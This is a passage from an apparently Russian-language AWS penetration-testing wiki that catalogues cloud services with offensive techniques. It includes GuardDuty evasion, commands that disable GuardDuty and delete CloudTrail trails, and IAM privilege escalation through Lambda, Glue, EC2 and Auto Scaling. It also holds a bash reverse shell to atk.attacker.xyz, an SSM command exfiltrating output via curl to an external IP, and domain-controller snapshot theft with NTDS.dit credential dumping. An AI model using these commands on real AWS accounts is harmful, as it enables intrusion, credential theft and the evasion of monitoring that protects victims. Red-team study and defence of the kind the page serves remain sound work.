Важно! Указано, что могут быть отправки СМС-уведомлений, так что тестировать осторожно.

P.S. Мб неверно название Endpoint'а. Надо проверять.

==== AWSCognitoIdentityService.GetCredentialsForIdentity ====

Позволяет получить AWS ключи для работы с AWS-консолью. По-умолчанию отключено.

Требуется aws_identity_pool_id.

В некоторых примерах оно также было указано как "com.amazonaws.cognito.identity.model.AWSCognitoIdentityService.GetCredentialsForIdentity"

Подробнее тут: https://blog.appsecco.com/exploiting-weak-configurations-in-amazon-cognito-in-aws-471ce761963

==== AWSCognitoIdentityService.GetOpenIdToken ====

Позволяет получить OpenID токен, действительный на 10 минут.

В примере требуется только "IdentityID"

==== AWSCognitoIdentityService.GetOpenIdTokenForDeveloperIdentity ====

Тоже позволяет получить OpenID токен, действительный на 10 минут. Но также создает новый "IdentityID" (если он не был указан).

==== AWSCognitoIdentityService.GetCredentialsForIdentity ====

Получить учетные данные пользователя по IdentityID: SecretKey, SessionToken, AccessKeyID.

https://docs.aws.amazon.com/cognitoidentity/latest/APIReference/API_GetCredentialsForIdentity.html

== GuardDuty ==

Сервис для детектирования атак используя машинное обучение.

Для детекта использует следующие сервисы:

* CloudTrail
* VPC Flow Logs
* DNS Logs
* ...to be continued

=== Обход защиты ===

Далее идут правила детекта и то, как их можно обойти.

==== UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration ====

Детектит, если AWS-API команды были запущены за пределами EC2 (используя токен этого EC2).

Правило эффективно, если хакер хочет украть токен с EC2 и использовать его вне EC2 (например, если есть только SSRF).

Обход простой: создать свой EC2-инстанс и делать API-запросы с полученными учетными данными жертвы.
Тогда правило не сработает, даже если учетные данные не принадлежат данной EC2 тк правило проверяет source ip и является ли он EC2.

Может быть для этого выгодно держать проксирующий сервер EC2.

==== UserAgent rules ====

Суть в том, что GuardDuty будет добавлять Alert если AWS-CLI использует UserAgent например Kali.
Варианты:

* Использовать утилиту pacu (уже есть смена User-Agent)

* Отредактировать botocore(https://github.com/boto/botocore) по пути /usr/local/lib/python3.7/dist-packages/botocore/session.py: поменять platform.release() на строку юзерагента.

=== Роли - Управление ===

Список ролей: https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazonguardduty.html

==== guardduty:UpdateDetector ====

Позволяет выключить GuardDuty (ну или редатировать правила):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
aws guardduty update-detector --detector-id <id of detector> --no-enable
</syntaxhighlight>
==== guardduty:DeleteDetector ====

Удалить правило детектирования:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
aws guardduty delete-detector --detector-id <id of detector>
</syntaxhighlight>

== STS (Security Token Service) ==

Сервис, позволяющий запросить временные учетные данные с ограниченными примилегиями для IAM-пользователей

== KMS (Key Management Service) ==

Сервис для создания криптографических ключей, управления ими и использования их в других сервисах.

Администраторы амазона не смогут получить к ним доступ.

Ключи со временем обновляются:

* Customers keys - раз в 365 дней

* AWS keys - раз в 3 года.

Старые ключи также можно будет использовать для расшифровки.

== CloudHSM (Hardware Security Module) ==

Замена KMS для богатых и тех, кто хочит побольше безопасности. Хранилище ключей, прикрепленное к аппаратному решению.

Пишут, что устройство будет закреплено только за вами.

Также можно получить доступ к CloudHSM-Instance по SSH.

== Athena ==

Интерактивный бессерверный сервис, позволяющий анализировать данные хранилища S3 стандартными средствами SQL.

Умеет работать с шифрованными S3 и сохранять шифрованный вывод.

== EBS (Elastic Block Store) ==

Сервис блочного хранилища (просто жесткий диск, который можно примонтировать).

=== Роли - управление сервисом ===

==== ec2:CreateVolume + ec2:AttachVolume ====

Возможность подключить EBS-Volume/Snapshot к EC2-виртуалке.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создание Volume из snapshot'а (если требуется подключить snapshot)
aws ec2 create-volume –snapshot-id snapshot_id --availability-zone zone
# Подключение Volume к виртуалке EC2
</syntaxhighlight>

Далее идем на виртуалку и вводим команды:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Поиск Volume
lsblk
# Проверка есть ли на нем данные
sudo file -s /dev/xvdf
# форматировать образ под ext4 (если неподходящая файловая система)
sudo mkfs -t ext4 /dev/xvdf
# Создаем директорию куда примонтируем позже
sudo mkdir /tmp/newvolume
# Монтируем
sudo mount /dev/xvdf /tmp/newvolume/
</syntaxhighlight>

Диск будет доступен на /tmp/newvolume.

== Lambda ==

Сервис для запуска своего кода в облаке.

=== Роли - повышение привилегий ===

==== lambda:UpdateFunctionCode ====

Позволяет поменять запущенный код, тем самым получив контроль над ролями, прикрепленными к этому коду:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws lambda update-function-code --function-name target_function --zip-file fileb://my/lambda/code/zipped.zip
</syntaxhighlight>

==== lambda:CreateFunction + lambda:InvokeFunction + iam:PassRole ====

Позволяет создать функцию и прикрепить к ней произвольную роль, после чего запустить.

Код функции:
<syntaxhighlight lang="python" line="1" enclose="div" style="overflow-x:scroll" >
import boto3
def lambda_handler(event, context):
client = boto3.client('iam')
response = client.attach_user_policy(
UserName='my_username',
PolicyArn="arn:aws:iam::aws:policy/AdministratorAccess"
)
return response
</syntaxhighlight>

Команды для запуска:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создание функции
aws lambda create-function --function-name my_function --runtime python3.6 --role arn_of_lambda_role --handler lambda_function.lambda_handler --code file://my/python/code.py
# Запуск
aws lambda invoke --function-name my_function output.txt
</syntaxhighlight>

=== Роли - управление ===

==== lambda:GetFunction ====

Также может понадобиться lambda:ListFunctions чтобы не перебирать названия функций.

Позволяет прочитать исходный код функции (в котором например может быть секрет сохранен):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получить список функций
aws lambda list-functions --profile uploadcreds
# Получить информацию о Lambda-функции
aws lambda get-function --function-name "LAMBDA-NAME-HERE-FROM-PREVIOUS-QUERY" --query 'Code.Location' --profile uploadcreds
# Скачать исходный код по ссылке из предыдущего ответа
wget -O lambda-function.zip url-from-previous-query --profile uploadcreds
</syntaxhighlight>

== Glue ==

Бессерверная служба интеграции данных, упрощающая поиск, подготовку и объединение данных для анализа, машинного обучения и разработки приложений.

=== Роли - повышение привилегий ===

==== glue:UpdateDevEndpoint ====

Позволяет обновить параметры Glue Development Endpoint, тем самым получив контроль над ролями, прикрепленными к этому Glue Development Endpoint:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# TODO: это не обновление параметров, надо обновить команду
aws glue --endpoint-name target_endpoint --public-key file://path/to/my/public/ssh/key.pub
</syntaxhighlight>

==== glue:CreateDevEndpoint + iam:PassRole ====

Позволяет получить доступ к ролям, которые прикреплены к любому сервису Glue:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws glue create-dev-endpoint --endpoint-name my_dev_endpoint --role-arn arn_of_glue_service_role --public-key file://path/to/my/public/ssh/key.pub
</syntaxhighlight>

== S3 ==

Файловое хранилище, доступное по http(s).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{bucket_name}.s3.amazonaws.com
https://s3.amazonaws.com/{bucket_name}/

# US Standard
http://s3.amazonaws.com
# Ireland
http://s3-eu-west-1.amazonaws.com
# Northern California
http://s3-us-west-1.amazonaws.com
# Singapore
http://s3-ap-southeast-1.amazonaws.com
# Tokyo
http://s3-ap-northeast-1.amazonaws.com
</syntaxhighlight>

Делать запросы можно:

* В браузере - http(s)

* Используя awscli:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws s3 ls s3://flaws.cloud/ [--no-sign-request] [--profile <PROFILE_NAME>] [ --recursive] [--region us-west-2]
</syntaxhighlight>

В S3 может использоваться шифрование:

* SSE-KMS - Server-Side с ключами KMS

* SSE-C - Server-Side с ключами заказчика

* CSE-KMS - Client-Side с ключами KMS

* CSE-C - Client-Side с ключами заказчика

=== Сбор информации ===

==== Определение региона ====

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
$ dig flaws.cloud
;; ANSWER SECTION:
flaws.cloud. 5 IN A 52.218.192.11

$ nslookup 52.218.192.11
Non-authoritative answer:
11.192.218.52.in-addr.arpa name = s3-website-us-west-2.amazonaws.com

# Итоговый URL будет:
flaws.cloud.s3-website-us-west-2.amazonaws.com
flaws.cloud.s3-us-west-2.amazonaws.com
</syntaxhighlight>
Если будет некорректный регион - редиректнет на корректный.

==== Список файлов ====

На S3-Bukket может быть включен листинг директорий, для этого достаточно перейти в браузере на хранилище и посмотреть возвращенный XML.

Список файлов может быть включен отдельно на определенные директории, поэтому может потребоваться брут директорий используя, например, wfuzz (подстрока AccessDenied).

=== Роли - управление ===

==== s3:ListBucket ====

Посмотреть список файлов в S3-хранилище:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws s3 ls s3://flaws.cloud/ [--no-sign-request] [--profile <PROFILE_NAME>] [ --recursive] [--region us-west-2]
</syntaxhighlight>

==== s3:ListAllMyBuckets ====

Посмотреть список всех S3-хранилищ, доступных мне:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws s3api list-buckets
aws s3 ls
</syntaxhighlight>

== CloudFront ==

Сервис сети доставки контента (CDN).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.cloudfront.net
</syntaxhighlight>

== EC2 (Elastic Compute Cloud) ==

EC2 (Amazon Elastic Compute Cloud) == VPS

Состоит из:

* Instance - название виртуальной машины

* AMI (Amazon Machine Image) - образ виртуальной машины

* SSM Agent - программное обеспечение Amazon, которое запущено на всеx EC2-инстансах, серверах и тд.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
ec2-{ip-seperated}.compute-1.amazonaws.com
</syntaxhighlight>

=== SSM Agent ===

Как уже выше написано, SSM Agent - программное обеспечение Amazon, которое запущено на всеx EC2-инстансах, серверах и тд.

Его тоже можно выбрать целью атаки

==== MITM ====

Есть возможность вклиниваться в общение от SSM-Агента локально.

PoC: https://github.com/Frichetten/ssm-agent-research/tree/main/ssm-session-interception

Полная статья: https://frichetten.com/blog/ssm-agent-tomfoolery/

=== Роли - повышение привилегий ===

==== ec2:RunInstance + iam:PassRole ====

Позволяет прикрепить существующую роль к скомпрометированной EC2-машине.

1. Запуск машины c новой прикрепленной ролью

2. Подключение к ней

3. Работа с прикрепленной ролью

Создание EC2 с известным SSH-ключем:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 run-instances --image-id ami-a4dc46db --instance-type t2.micro --iam-instance-profile Name=iam-full-access-ip --key-name my_ssh_key --security-group-ids sg-123456
</syntaxhighlight>

Второй вариант - скрипт для запуска:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 run-instances --image-id ami-a4dc46db --instance-type t2.micro --iam-instance-profile Name=iam-full-access-ip --user-data file://script/with/reverse/shell.sh
</syntaxhighlight>

Важно! Может спалиться с GuardDuty когда учетные данные пользователя будут использованы на стороннем инстансе EC2.

=== Роли - повышение до админа ===

==== ec2:AssociateIamInstanceProfile ====

Позволяет менять IAM политики/роли/пользователей

==== ec2:CreateInstanceProfile/ec2:AddRoleToInstanceProfile + iam:PassRole ====

Позволяет создать новый привилегированный профиль для инстанса и прикрепить его к скомпрометированной EC2-машине.

=== Роли - управление ===

==== ec2:CreateVolume + ec2:AttachVolume ====

См. EBS.

==== ec2:DescribeSnapshots ====

Позволяет посмотреть информацию о SnapShot'ах, которые позже мб потребуется прочитать:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 describe-snapshots --profile flawscloud --owner-id 975426262029 --region us-west-2
</syntaxhighlight>

==== ec2:CreateVolume ====

Прзврояет примаунтить SnapShot, чтобы потом его изучить:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 create-volume --profile YOUR_ACCOUNT --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-0b49342abd1bdcb89
</syntaxhighlight>

==== ec2:* (Копирование EC2) ====

Позволяет скопировать EC2 используя AMI-images:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создаем новый AMI из Instance-ID
aws ec2 create-image --instance-id i-0438b003d81cd7ec5 --name "AWS Audit" --description "Export AMI" --region eu-west-1

# Добавляем наш ключ в систему
aws ec2 import-key-pair --key-name "AWS Audit" --public-key-material file://~/.ssh/id_rsa.pub --region eu-west-1

# Создаем EC2-Instance используя созданный AMI (параметры security group и подсеть оставили те же)
aws ec2 run-instances --image-id ami-0b77e2d906b00202d --security-group-ids "sg-6d0d7f01" --subnet-id subnet-9eb001ea --count 1 --instance-type t2.micro --key-name "AWS Audit" --query "Instances[0].InstanceId" --region eu-west-1

# Проверяем запустился ли инстанс
aws ec2 describe-instances --instance-ids i-0546910a0c18725a1

# Не обязательно - редактируем группу инстанса
aws ec2 modify-instance-attribute --instance-id "i-0546910a0c18725a1" --groups "sg-6d0d7f01" --region eu-west-1

# В конце работы - останавливаем и удаляем инстанс
aws ec2 stop-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1
aws ec2 terminate-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1
</syntaxhighlight>

==== ec2-instance-connect:SendSSHPublicKey ====

Добавить SSH-ключ к EC2-инстансу. Ключ будет существовать 60 секунд.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получаем информацию об инстансе, который будем атаковать.
aws ec2 describe-instances --profile uploadcreds --region eu-west-1 | jq ".[][].Instances | .[] | {InstanceId, KeyName, State}"

# Добавляем ключ к EC2-инстансу.
aws ec2-instance-connect send-ssh-public-key --region us-east-1 --instance-id INSTANCE --availability-zone us-east-1d --instance-os-user ubuntu --ssh-public-key file://shortkey.pub --profile uploadcreds</syntaxhighlight>

==== ec2-instance-connect:SendSerialConsoleSSHPublicKey ====

Добавить SSH-ключ к EC2-инстансу. Ключ будет существовать 60 секунд.

В отличие от предыдущего пункта, этот ключ можно использовать только при подключении EC2 Serial Console.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получаем информацию об инстансе, который будем атаковать.
aws ec2 describe-instances --profile uploadcreds --region eu-west-1 | jq ".[][].Instances | .[] | {InstanceId, KeyName, State}"

# Добавляем ключ к EC2-инстансу.
aws ec2-instance-connect send-serial-console-ssh-public-key --instance-id i-001234a4bf70dec41EXAMPLE --serial-port 0 --ssh-public-key file://my_key.pub --region us-east-1

# Подключаемся (кроме GovCloud US региона)
ssh -i my_key i-001234a4bf70dec41EXAMPLE.port0@serial-console.ec2-instance-connect.us-east-1.aws
# Подключаемся (только для GovCloud US региона)
ssh -i my_key i-001234a4bf70dec41EXAMPLE.port0@serial-console.ec2-instance-connect.us-gov-east-1.amazonaws.com

# В некоторых случаях нужно подключиться к EC2 и перезагрузить сервис getty (лучше пробовать только, когда не смогли подключиться)
sudo systemctl restart serial-getty@ttyS0
# Если не сработало - мб требуется ребутать сервер.
</syntaxhighlight>

Также можно подключиться, используя браузер. Подробнее тут: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/connect-to-serial-console.html

==== ssm:SendCommand ====

Позволяет запускать команды в EC2-Instances. Если нет дополнительных прав, то потребуется:

* Знать Instance-ID, на котором запущен сервис SSM

* Свой сервер, на который будет приходить отстук - результат команды.

Команды для эксплуатации:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получаем информацию о SSM сервисах - может потребоваться ssm:DescribeInstanceInformation
aws ssm describe-instance-information --profile stolencreds --region eu-west-1
# Выполняем команду
aws ssm send-command --instance-ids "INSTANCE-ID-HERE" --document-name "AWS-RunShellScript" --comment "IP Config" --parameters commands=ifconfig --output text --query "Command.CommandId" --profile stolencreds
# Получаем результат команды(может не хватить прав ssm:ListCommandInvocations)
aws ssm list-command-invocations --command-id "COMMAND-ID-HERE" --details --query "CommandInvocations[].CommandPlugins[].{Status:Status,Output:Output}" --profile stolencreds

# Пример - результат команды на удаленный сервер
$ aws ssm send-command --instance-ids "i-05b████████adaa" --document-name "AWS-RunShellScript" --comment "whoami" --parameters commands='curl 162.243.███.███:8080/`whoami`' --output text --region=us-east-1
</syntaxhighlight>

==== EC2:CreateSnapshot + Active Directory ====

См. AD.

== Auto Scaling (autoscaling) ==

Сервис для масштабирования приложений. Работает преимущественно с EC2, ECS, DynamoDB (таблицы и индексы) и Aurora.

Для работы сервиса требуется:

1. Конфигурация запуска EC2.

2. Конфигурация масштабирования.

== Роли - повышение привилегий ==

=== autoscaling:CreateLaunchConfiguration + autoscaling:Create(Update)AutoScalingGroup + iam:PassRole ===

Позволяет создать и запустить конфигурацию масштабирования.

==== Создаем конфигурацию запуска EC2 ====

Для создания требуется:

1. Image-id

2. iam-instance-profile

Следующая команда создает конфигурацию с командой из файла reverse-shell.sh:

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws autoscaling create-launch-configuration --launch-configuration-name demo3-LC --image-id ami-0f90b6b11936e1083 --instance-type t1.micro --iam-instance-profile demo-EC2Admin --metadata-options "HttpEndpoint=enabled,HttpTokens=optional" --associate-public-ip-address --user-data=file://reverse-shell.sh
</syntaxhighlight>

Пример содержимого reverse-shell.sh:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
#!/bin/bash
/bin/bash -l > /dev/tcp/atk.attacker.xyz/443 0<&1 2>&1
</syntaxhighlight>

==== Создаем и запускаем группу масштабируемости ====

Привилегия ec2:DescribeSubnets нужна для выбора нужной сети (чтобы EC2 смог сделать reverse-соедиенение к нам).

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws autoscaling create-auto-scaling-group --auto-scaling-group-name demo3-ASG --launch-configuration-name demo3-LC --min-size 1 --max-size 1 --vpc-zone-identifier "subnet-aaaabbb"
</syntaxhighlight>

Подробнее тут https://notdodo.medium.com/aws-ec2-auto-scaling-privilege-escalation-d518f8e7f91b

== AD (Directory Service) ==

Второе название - AWS Managed Microsoft Active Directory. Позволяет использовать Active Directory в AWS.

Основные понятия:

* EC2-Instance - VPS на которых крутится весь Active Directory

=== Роли - повышение привилегий ===

==== EC2:CreateSnapshot + EC2:RunInstance -> ShadowCopy ====

Позволяет провести атаку ShadowCopy на доменный контроллер и считать учетные данные всех пользователей.

Последовательность атаки:

1. Получаем список инстансов

2. Создаем Snapshot выбранного сервера

3. Редактируем атрибуты у SnapShot для доступа с аккаунта атакующего.
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 modify-snapshot-attribute --snapshot-id snap-1234567890abcdef0 --attribute createVolumePermission --operation-type remove --user-ids 123456789012
</syntaxhighlight>

4. Переключаемся на аккаунт атакующего

5. Создаем новый Linux EC2-инстанс, к которому будет прикреплен SnapShot

6. Подключаемся по SSH и получаем данные из SnapShot
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
sudo -s
mkdir /tmp/windows
mount /dev/xvdf1 /tmp/windows/
cd /tmp/windows/
</syntaxhighlight>

7. Работаем с данными на примонтированном диске, который будет в /tmp/windows/. Пример команд для извлечения ntds.dit:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
cp /windows/Windows/NTDS/ntds.dit /home/ec2-user
cp /windows/Windows/System32/config/SYSTEM /home/ec2-user
chown ec2-user:ec2-user /home/ec2-user/*
# Sftp - скачиваем файлы:
/home/ec2-user/SYSTEM
/home/ec2-user/ntds.dit
# Получаем учетные данные, используя Impacket-secretsdump
secretsdump.py -system ./SYSTEM -ntds ./ntds.dit local -outputfile secrets
</syntaxhighlight>

== CloudTrail ==

Сервис для аудита событий в AWS-аккаунте (включен в каждом аккаунте по-умолчанию). Сервис позволяет вести журналы, осуществлять непрерывный мониторинг и сохранять информацию об истории аккаунта в пределах всей используемой инфраструктуры AWS.

Записывает:

* API-вызовы

* Логины в систему

* События сервисов

* ???

Важен при операциях RedTeam.

Название файла логов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
AccountID_CloudTrail_RegionName_YYYYMMDDTHHmmZ_UniqueString.FileNameFormat
</syntaxhighlight>

S3 путь до логов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
BucketName/prefix/AWSLogs/AccountID/CloudTrail/RegionName/YYYY/MM/DD
</syntaxhighlight>

Путь у CloudTrail-Digest файлов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
s3://s3-bucket-name/optional-prefix/AWSLogs/aws-account-id/CloudTrail-Digest/region/digest-end-year/digest-end-month/digest-end-data/aws-account-id_CloudTrail-Digest_region_trail-name_region_digest_end_timestamp.json.gz
</syntaxhighlight>

Основные поля у событий:

* eventName - имя API-endpoint

* eventSource - вызванный сервис

* eventTime - время события

* SourceIPAddress - ip-адрес источника

* userAgent - метод запроса
** "signing.amazonaws.com" - запрос от AWS Management Console
** "console.amazonaws.com" - запрос от root-пользователя аккаунта
** "lambda.amazonaws.com" - запрос от AWS Lambda

* requestParameters - параметры запроса

* responseElements - элементы ответа.

Временные параметры:

* 5 минут - сохраняется новый лог-файл

* 15 минут - сохраняется в S3.

Важно! Сохраняется чексумма файлов, поэтому пользователи могут удостовериться что логи не менялись.
Также логи могут уходить напрямую в CloudWatch - администраторам может прилететь уведомление об ИБ-инцидентах. Или события могут быть проанализированы внутренним модулем CloudTrail - Insights на предмет необычной активности.

=== Роли - управление ===

==== cloudtrail:DeleteTrail ====

Позволяет отключить мониторинг:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws cloudtrail delete-trail --name cloudgoat_trail --profile administrator
</syntaxhighlight>

==== cloudtrail:UpdateTrail ====

Права на редактирование правил монитринга.

Отключить мониторинг глобальных сервисов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event
</syntaxhighlight>

Отключить мониторинг на конкретные регионы:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event --no-is-multi-region --region=eu-west
</syntaxhighlight>

==== validate-logs ====

Проверить, были ли изменены логи.

aws cloudtrail validate-logs --trail-arn <trailARN> --start-time <start-time> [--end-time <end-time>] [--s3-bucket <bucket-name>] [--s3-prefix <prefix>] [--verbose]

=== Эксплуатация ===

==== Обход правила по UserAgent ====

На сервисе есть правило, по которому определяет, что запросы были сделаны с kali/parrot/pentoo используя awscli.

Для этого можно воспользоваться утилитой pacu, которая автоматически подменяет useragent. Использование утилиты в конце статьи.

== DynamoDB ==

Cистема управления базами данных класса NoSQL в формате «ключ — значение».

=== Роли - управление ===

==== dynamodb:ListTables ====

Позволяет посмотреть спрсок таблиц базы данных.
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws --endpoint-url http://s3.bucket.htb dynamodb list-tables

{
"TableNames": [
"users"
]
}
</syntaxhighlight>

==== dynamodb:Scan ====

Получение обьектов из базы данных:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws --endpoint-url http://s3.bucket.htb dynamodb scan --table-name users | jq -r '.Items[]'

{
"password": {
"S": "Management@#1@#"
},
"username": {
"S": "Mgmt"
}
}
</syntaxhighlight>

== ES (ElasticSearch) ==

ElasticSearch от AWS. Используется для просмотра логов/журналов, поиска на вебсайте и тд.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{user_provided}-{random_id}.{region}.es.amazonaws.com
</syntaxhighlight>

== ELB (Elastic Load Balancing) ==

Балансировщик нагрузки.

Формат ссылки (elb_v1):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
http://{user_provided}-{random_id}.{region}.elb.amazonaws.com:80/443
</syntaxhighlight>

Формат ссылки (elb_v2):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{user_provided}-{random_id}.{region}.elb.amazonaws.com
</syntaxhighlight>

== RDS (Relational Database Service) ==

Облачная реляционная база данных (на выбор).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
mysql://{user_provided}.{random_id}.{region}.rds.amazonaws.com:3306
postgres://{user_provided}.{random_id}.{region}.rds.amazonaws.com:5432
</syntaxhighlight>

== Route 53 ==

Настраиваемая служба DNS.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
{user_provided}
</syntaxhighlight>

== API Gateway ==

API-сервис, который будет доступен почти со всех серверов.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{restapi_id}.execute-api.{region}.amazonaws.com/{stage_name}/
https://{random_id}.execute-api.{region}.amazonaws.com/{user_provided}
</syntaxhighlight>

== CloudSearch ==

Альтернатива сервису ElasticSearch. Система для упрощения поиска для администрирования и, например, на вебсайте.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://doc-{user_provided}-{random_id}.{region}.cloudsearch.amazonaws.com
</syntaxhighlight>

== Transfer Family ==

Группа сервисов для передачи файлов (S3/EFS) по (SFTP, FTPS, FTP).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
sftp://s-{random_id}.server.transfer.{region}.amazonaws.com
ftps://s-{random_id}.server.transfer.{region}.amazonaws.com
ftp://s-{random_id}.server.transfer.{region}.amazonaws.com
</syntaxhighlight>

== IoT (Internet Of Things) ==

Сервис для управления IoT-устройствами.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
mqtt://{random_id}.iot.{region}.amazonaws.com:8883
https://{random_id}.iot.{region}.amazonaws.com:8443
https://{random_id}.iot.{region}.amazonaws.com:443
</syntaxhighlight>

== MQ ==

Сервис брокера сообщений для Apache ActiveMQ & RabbitMQ.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:8162
ssl://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:61617
</syntaxhighlight>

== MSK (Managed Streaming for Apache Kafka) ==

Сервис потоковой передачи данных в Apache Kafka.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
b-{1,2,3,4}.{user_provided}.{random_id}.c{1,2}.kafka.{region}.amazonaws.com
{user_provided}.{random_id}.c{1,2}.kafka.useast-1.amazonaws.com
</syntaxhighlight>

== Cloud9 ==

Облачная интегрированная среда разработки(IDE) используя только браузер.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.vfs.cloud9.{region}.amazonaws.com
</syntaxhighlight>

== MediaStore ==

Cервис хранилища AWS, оптимизированный для мультимедийных материалов.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.data.mediastore.{region}.amazonaws.com
</syntaxhighlight>

== Kinesis Video Streams ==

Обеспечивает простую и безопасную потоковую передачу видео с подключенных устройств в AWS для воспроизведения, аналитики, машинного обучения (ML) и других видов обработки.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.kinesisvideo.{region}.amazonaws.com
</syntaxhighlight>

== Elemental MediaConvert ==

Сервис перекодирования видеофайлов с возможностями на уровне вещательных компаний. Он позволяет просто создавать контент в формате «видео по требованию» (VOD) для трансляций, в том числе мультиэкранных, в любом масштабе.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.mediaconvert.{region}.amazonaws.com
</syntaxhighlight>

== Elemental MediaPackage ==

Cервис для подготовки и защиты видеоконтента, распространяемого через Интернет. AWS Elemental MediaPackage использует один источник видео и создает на его основе специализированные видеопотоки для воспроизведения на подключенных телевизорах, мобильных телефонах, компьютерах, планшетах и игровых консолях.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.mediapackage.{region}.amazonaws.com/in/v1/{random_id}/channel
</syntaxhighlight>

== ECR (Elastic Container Registry) ==

Региональный сервис, предназначенный для обеспечения гибкого развертывания образов.

=== Роли - управление ===

==== ecr:ListImages ====

Получить список образов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ecr list-images --repository-name <ECR_name> --registry-id <UserID> --region <region> --profile <profile_name>
</syntaxhighlight>

==== ecr:GetDownloadUrlForLayer ====

Позволяет получить URL на скачивание образа.

==== ecr:GetDownloadUrlForLayer + ecr:BatchGetImage + ecr:GetAuthorizationToken ====

Позволяет скачать образ (мб потребуется и ecr:ListImages чтобы получить список образов):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ecr get-login
docker pull <UserID>.dkr.ecr.us-east-1.amazonaws.com/<ECRName>:latest
docker inspect sha256:079aee8a89950717cdccd15b8f17c80e9bc4421a855fcdc120e1c534e4c102e0
</syntaxhighlight>

== Augmented AI (Amazon A2I) ==

Предоставляет интерфейс для обработки человеком предварительных результатов, полученных с помощью машинного обучения.

[[File:A2i.png|80%]]

Данные сохраняются в S3, а также к задаче прикрепляется IAM-роль .

При создании задачи разделяется на 3 варианта:

* Textract - извлечение пары ключ-значение из текста

